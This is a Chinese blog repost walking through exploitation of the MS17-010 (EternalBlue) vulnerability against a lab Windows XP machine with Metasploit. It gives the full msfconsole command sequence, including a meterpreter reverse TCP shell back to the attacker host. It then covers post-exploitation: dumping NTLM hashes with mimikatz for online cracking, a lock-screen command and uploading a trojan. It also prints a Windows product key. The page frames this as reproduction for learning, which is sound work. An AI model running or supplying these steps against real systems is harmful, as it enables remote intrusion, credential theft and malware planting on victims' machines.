【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法
2019-07-16 23:54
1556 查看
原文链接:http://www.cnblogs.com/v1vvwv/p/ms17-010-exploit.html




日期:2018-07-21 21:09:16
介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell、查看文件、获取密码。
0x01、实验环境
攻击机
系统:macOS Sierra 10.12.5 IP:10.211.55.2
靶机
系统:Windows XP SP3 英文版(虚拟机) IP:10.211.55.19 激活码:HTXH6-2JJC4-CDB6C-X38B4-C3GF3
0x02、使用 msf 攻击 XP
在
mac中使用
metasploit和
kali中使用
metasploit去做攻击,流程是一样的,按照以下步骤进行即可。
首先在命令行输入
msfconsole进入
metasploit。

进入后,使用
search命令,查找与
ms17-010相关的模块。

依次进行以下操作。
# 选择 msf 相关的模块 use exploit/windows/smb/ms17_010_psexec # 查看需要设置的信息 show options # 设置靶机的 IP 和端口 set rhosts 10.211.55.19 set rport 445 # 设置攻击使用的 payload set payload windows/meterpreter/reverse_tcp set lhost 10.211.55.2 set lport 4444 # 进行攻击 exploit
成功弹回 shell。

0x03、其他操作
查看靶机文件
查看靶机文件,可直接在
shell中执行
cmd命令。

也可以直接在
meterpreter中操作。

提取 Windows 密码
提取 Windows 密码的 hash:
密码哈希有三种方式:LM、NTLM、NTLMv2,LM 存储的时候,7个字符一组(如果密码长度是14位,就会分成两组),NTLM 是整体转换。 使用工具 mimikatz,获取到 ntlm 的值, 然后去 http://www.objectif-securite.ch/en/ophcrack.php 解密即可。
相关命令:
getsystem load mimikatz msv

电脑锁屏
shell echo rundll32.exe user32.dll LockWorkStation > 1.bat 1.bat
植入木马
upload /tmp/muma.exe c:\\
0x04、其他
利用 meterpreter 还可以进行监听键盘、获取图形化界面等操作,
此处不一一演示,有兴趣可上网查询相关资料。
转载于:https://www.cnblogs.com/v1vvwv/p/ms17-010-exploit.html
相关文章推荐
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
- 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010
- ms17-010永恒之蓝漏洞复现
- MS17-010 永恒之蓝漏洞利用
- ms17-010永恒之蓝漏洞利用
- 永恒之蓝 ms17_010漏洞的利用 msf
- 【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞
- 使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
- MSF下利用MS17-010漏洞入侵win7主机
- 利用NSA的MS17-010漏洞利用工具实现Win 7和Win Server 2008系统入侵
- 【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞
- ms17-010漏洞复现
- 复现永恒之蓝漏洞利用过程
- ms17_010漏洞复现
- 利用ms17-010漏洞提权
- MS17-010漏洞利用工具系统入侵(实测)
- 利用Vulnhub复现漏洞 - ElasticSearch 命令执行漏洞(CVE-2014-3120)测试环境
- 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)
- 利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞(CVE-2018-1000861)
- 利用Vulnhub复现漏洞 - Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)